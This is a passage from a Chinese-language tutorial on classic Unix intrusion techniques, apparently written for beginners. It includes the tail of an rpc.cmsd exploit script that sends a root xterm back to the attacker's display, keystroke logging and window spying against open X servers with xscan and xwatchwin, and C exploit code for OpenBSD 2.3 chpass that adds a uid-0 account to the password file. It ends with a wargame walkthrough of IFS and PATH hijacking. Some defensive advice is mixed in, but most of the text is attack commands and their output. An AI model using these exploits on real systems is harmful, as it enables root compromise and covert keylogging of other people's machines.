战术攻防思维撷粹

grep 100068 = ture - you win!"
echo "Don't forget to xhost+ the target system"
echo " "
echo "Usage: $0 target_hostname target_ip < O/S version (1-7)> your_ip"
exit 1
fi
echo "Executing exploit..."
cmsd -h $1 -c "/usr/openwin/bin/xterm -display $4:0.0 &" $3 $2
#####cmsd.sh end##########
[Labmachine]#cmsd.sh {system_name} 192.168.1.11 2 192.168.1.103
rpc.cmsd漏洞是针对特定的操作系统而量身定制的，本例程中适合于Solaris2.5、2.6、2.7操作系统。溢出成功后，则回送攻击者一个xterm的shell命令，其权限是受害主机的root！这种典型应用的确让人吓了一跳。
RPC带来便利的同时也引入安全问题，因此现代的UNIX系统中引入了密钥方式的Secure RPC，这种认证机制的引入相信可以修补RPC不健全的机制。
**X window小试
专业的Unix管理员一般很排斥使用GUI界面方式来管理系统。但是对于初学者来说，使用图形管理界面能逐渐适应从“鼠标到键盘”的管理思维方式的转变。X window系统则提供了多个程序以图形方式显示的丰富特性。但由于X windows是基于网络机制设计的，一旦用户掌握X windows就可以捕获键盘击键、关闭窗口、启动各种恶意命令，这种无法无天的闹剧真是令人头痛。当然，可以xhost命令进行认证控制。但是有些管理员为求方便，使用xhost +命令，于是允许了未加认证的访问。
通过xscan可以扫描出具有xhost +设置的X服务器。pendleto于96年写的一个小工具，经久不衰呀!扫描网络中开放Xwindow并且允许连接的主机，并自动开始记录该Xwindow系统的所有键盘击键。
[Labmachine]$xscan Xmachine
Scanning hostname Xmachine…
Connection to Xmachine (192.168.1.65) on port 6000
Connected.
Host quake is running X.
Starting keyboard logging of host Xmachine:0.0 to file KEYLOG.Xmachine:0.0… #其键盘记录文件为KEYLOG.Xmachine，记录非常详细：
[Labmachine]$tail –f KEYLOG.Xmachine:0.0
su
root[Shift_R]sys #使用xlswins确定目标系统窗口的16进制ID号
[Labmachine]#xlswins –display Xmachine:0.0
……
0x1000385 (netscape)
……
#从大量信息可以看见有netscape的浏览器在运行，使用xwatchwin查看ID，就#可以任意监测目标窗口的操作活动。
[Labmachine]#xwatchwin Xmachine –w 0x1000385 如果限制xhost -，那么仍然可以绕过认证，使用xwd来截获荧屏的瞬间图像。对于X window的使用应该注意在防火墙封堵6000-6063端口，使用SSH等方式加密X 会话，并使用XDM-AUTHORIZATION-1等安全认证机制防止偷窃行为的发生。 【文件描述字符的利用】
文件描述字符(file descriptor)是文件属性的字符象征，0、1和2分别表示了标准输入、标准输出和标准错误输出。当打开或创建文件的时候，内核为调用程序分配一个文件描述字，可用于读写该文件。按照这个原理，如果更改写某个关键的系统文件，我们可以使用文件描述进行写入操作，从而得到root权限。
OpenBSD 2.3版本中存在这样的漏洞，用于修改密码的chpass执行时允许普通用户使用自选的编辑器编辑临时文件，于是可以设置编辑器为vi，从而逸出一个shell，这样就可以在/etc/master.passwd中创建一个uid为零的帐号，以此获得root访问权限：
[BigHole]$export EDITOR=vi
[BigHole]$/usr/bin/chpass
#编辑用户数据库
Shell:/bin/sh
Full Name:star amethyst
Location:
Office Phone:
Home Phone:
#使用vi编辑器逸出shell
":!sh"
#执行由Mark Zielinski提供的chpass漏洞挖掘代码，添加staramethyst帐号
[BigHole]$nohup ./chpass &
[1] 21553
$ sending output to nohup.out
[1] + Done nohup ./chpass
[BigHole]$exit
Press any key to continue [: to enter more ex commands]:
/etc/pw.F26119: 6 lines,117 characters.
#至此，完成权限提升，得到root权限
[BigHole]$su staramethyst
[BigHole]#id
uid=0(owned) gid=0(wheel) groups=0(wheel)
(附chpass代码：
int main()
{
FILE *f;
int count;
f=fdopen (FDTOUSE, "a");
for (count = 0; count !=30000; count++)
fprintf(f, "owned::0:0::0:0:staramethyst,,,:tmp:/bin/bash\n");
ext(0);
}
)
关于文字描述符号问题，应该是程序员考虑的问题：自己是否恰当分配了文件描述字符；非必要的suid,guid的文件应该除去其属性等因素。系统很多安全的漏洞原因其实是由于平日对代码的不严格审查而产生的，这里是否值得我们这些程序员深思呢？对于不安全特性，不仅是用户的问题，而是整个网络帝国应该考虑的问题。 【输入域分隔符IFS】
“记起以前在Log指点我在hackerslab攻关日子真的很辛苦。其中有一道关就是理解IFS，从而得到通关密码。” IFS变量用于在shell环境中分隔所输入的执行。通常设置为空白符。一种攻击的方法是通过输入域分隔符（IFS）Shell变量得逞的。例如一个程序调用函数system()执行命令，那么该命令首先由Shell来分析。程序执行代码system("/bin/ls-l"),同时IFS变量被设置为包含“/”的字符，而一个恶意的程序被命名为bin并放在用户的PATH内，则该命令会被解释成bin ls-l,它执行程序bin并带有两个参数ls和-l，这就实现权限提升
下面是设置IFS的命令的例子：
$IFS=/
$export $IFS
有了以上理论基础，我们将对hackerslab的第四关进行讲解。
題目：
Steven 的慢动作是出了名的，他从來不会准时！他也察觉到這个问题，并且知道他必須做一点改变，他配合 `date` 這个指令，用 C 语言写了一个简单的工具，可以在他每次登录电脑用 YYYY-MM-DD 的格式显示目前的时间。他把它放在一个秘密的目录之中，因为他担心其他人会看见这个工具。把它找出來，并且获得进入下一关的密碼。 攻关步骤：
Steven程序date指令显示日期，因此在环境变量中设置命令执行路径先于原路径，并制造一个date脚本，就可以执行自己定义的date指令，从而获得执行执行/bin/pass的权利，获得密码：
1、设置PATH变量
PATH=~/tmp:$PATH
2、制作date
[level3]#vi date
#!/bin/sh
/bin/pass [level3]chmod +x date
3、由于程序使用date绝对路径，设置IFS为/
[level3]IFS=/
[levle3]export IFS
4、得到过关密码
[level3]./today
通过此题，对于IFS有了深入的理解。新版本的Unix系统已经能够忽略IFS的设置，所以对于现代主流的系统危害不算很大，不过由于入侵手法很精巧，因此加入文中。 *我们一直在尽力
耗费了几个通宵，总算完成了这片面向初级学者的入侵防御的文章。但是关于系统安全方面的很多领域我们仍然没有涉及，而且很多地方也是带领读者走马观花般的领略在入侵方面许多精致的思维和独特的创意，并没有做深入的分析和讲解，因为时间和工作关系，希望读者谅解。
然而，我希望这篇文章能起到一个抛砖引玉的作用，通过本文能激发各位的创造欲和对新事物探索的强烈渴望。使用自己无穷的动力和潜在思维在这里虚拟世界中创造更加美好的事物。

关键词：战术攻防思维撷粹